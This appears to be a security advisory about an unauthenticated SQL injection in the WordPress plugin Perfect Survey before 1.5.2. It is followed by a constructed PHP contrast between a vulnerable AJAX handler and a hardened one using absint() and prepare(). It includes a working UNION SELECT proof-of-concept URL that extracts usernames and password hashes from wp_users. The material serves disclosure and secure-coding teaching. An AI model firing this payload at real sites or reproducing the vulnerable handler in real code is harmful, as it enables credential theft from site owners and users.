The plugin does not validate and escape the question_id GET parameter before using it in a SQL statement in the get_question AJAX action, allowing unauthenticated users to perform SQL injection.
(The question_id must start with an existing post ID) https://example.com/wp-admin/admin-ajax.php?action=get_question&question_id=1 union select 1%2C1%2Cchar(116%2C101%2C120%2C116)%2Cuser_login%2Cuser_pass%2C0%2C0%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull from wp_users
CPE | Name | Operator | Version
---|---|---|---
 | perfect-survey | lt | 1.5.2
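To make the root cause and the fix concrete, here is an added, constructed AJAX handler pair (not the plugin's own code): the vulnerable shape interpolates the raw `question_id` GET value into the SQL text, the hardened shape coerces it to an integer and binds it through `$wpdb->prepare()`. The function names and the `example_questions` table are hypothetical; `$wpdb`, `absint()`, `wp_send_json_*()` and the `wp_ajax_*` hooks are standard WordPress APIs.

```php
<?php
// Constructed example, not code from the Perfect Survey plugin.
// Table and function names are hypothetical; $wpdb is WordPress's DB object.

// Vulnerable shape (shown for contrast only, deliberately not registered as a
// handler): once the leading integer ends, everything after it becomes part of
// the SQL statement, which is the flaw the advisory above describes.
function example_get_question_vulnerable() {
    global $wpdb;
    $question_id = $_GET['question_id'];                    // unvalidated, unescaped
    $sql = "SELECT * FROM {$wpdb->prefix}example_questions WHERE id = " . $question_id;
    $row = $wpdb->get_row( $sql );                          // string built by hand, no prepare()
    wp_send_json( $row );
}

// Hardened shape: the parameter can only ever reach the query as a number,
// the query binds it with %d, and the handler fails closed on bad input.
function example_get_question_hardened() {
    global $wpdb;
    // absint() discards everything that is not a non-negative integer, so
    // "1 union select ..." collapses to 1 and cannot alter the statement.
    $question_id = isset( $_GET['question_id'] ) ? absint( $_GET['question_id'] ) : 0;
    if ( 0 === $question_id ) {
        wp_send_json_error( array( 'message' => 'invalid question_id' ), 400 );
    }
    // Explicit column list instead of SELECT *, and a prepared placeholder.
    $row = $wpdb->get_row(
        $wpdb->prepare(
            "SELECT id, title, type FROM {$wpdb->prefix}example_questions WHERE id = %d",
            $question_id
        )
    );
    if ( null === $row ) {
        wp_send_json_error( array( 'message' => 'not found' ), 404 );
    }
    wp_send_json_success( $row );
}

// The action name matches the one in the advisory; both the logged-in and the
// unauthenticated (nopriv) hooks point at the hardened handler.
add_action( 'wp_ajax_get_question',        'example_get_question_hardened' );
add_action( 'wp_ajax_nopriv_get_question', 'example_get_question_hardened' );
```

The same `absint()` plus `%d` pattern applies to any numeric ID taken from `$_GET`/`$_POST`; string parameters go through `%s` in `prepare()` rather than manual escaping.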